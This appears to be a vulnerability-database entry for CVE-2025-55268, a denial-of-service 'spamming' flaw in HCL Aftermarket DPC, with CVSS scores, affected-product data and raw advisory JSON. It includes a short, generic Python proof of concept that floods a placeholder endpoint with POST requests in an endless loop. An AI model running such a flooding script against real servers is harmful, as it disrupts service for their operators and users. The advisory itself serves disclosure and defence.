Security Vulnerability Report
中文
CVE-2025-55268 CVSS 4.3 MEDIUM

CVE-2025-55268

Published: 2026-03-26 13:16:26
Last Modified: 2026-03-26 20:34:21
Source: [email protected]

Description

HCL Aftermarket DPC is affected by Spamming Vulnerability which can allow the actor to excessive spamming can consume server bandwidth and processing resources which may lead to Denial of Service.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:* - VULNERABLE
HCL Aftermarket DPC (具体受影响版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # Target URL (Replace with actual vulnerable endpoint) target_url = "http://target-server/vulnerable-endpoint" def spam_attack(): headers = { "User-Agent": "Mozilla/5.0 (Compatible; CVE-2025-55268 PoC)", "Content-Type": "application/x-www-form-urlencoded" } payload = { "message": "Spam data to consume resources" } print("[+] Starting spam attack simulation...") try: while True: # Send POST request continuously response = requests.post(target_url, data=payload, headers=headers, timeout=5) print(f"[+] Request sent, Status Code: {response.status_code}") time.sleep(0.1) # Minimal delay to flood the server except KeyboardInterrupt: print("\n[-] Attack stopped by user.") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": spam_attack()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55268", "sourceIdentifier": "[email protected]", "published": "2026-03-26T13:16:26.103", "lastModified": "2026-03-26T20:34:20.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Aftermarket DPC is affected by Spamming Vulnerability which can allow the actor to excessive spamming can consume server bandwidth and processing resources which may lead to Denial of Service."}, {"lang": "es", "value": "HCL Aftermarket DPC se ve afectado por una Vulnerabilidad de spamming que puede permitir al actor que el spamming excesivo consuma ancho de banda del servidor y recursos de procesamiento, lo que puede llevar a una Denegación de Servicio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-799"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "C71E5E64-ED4C-4763-8A74-5F9DDCFD13DA"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.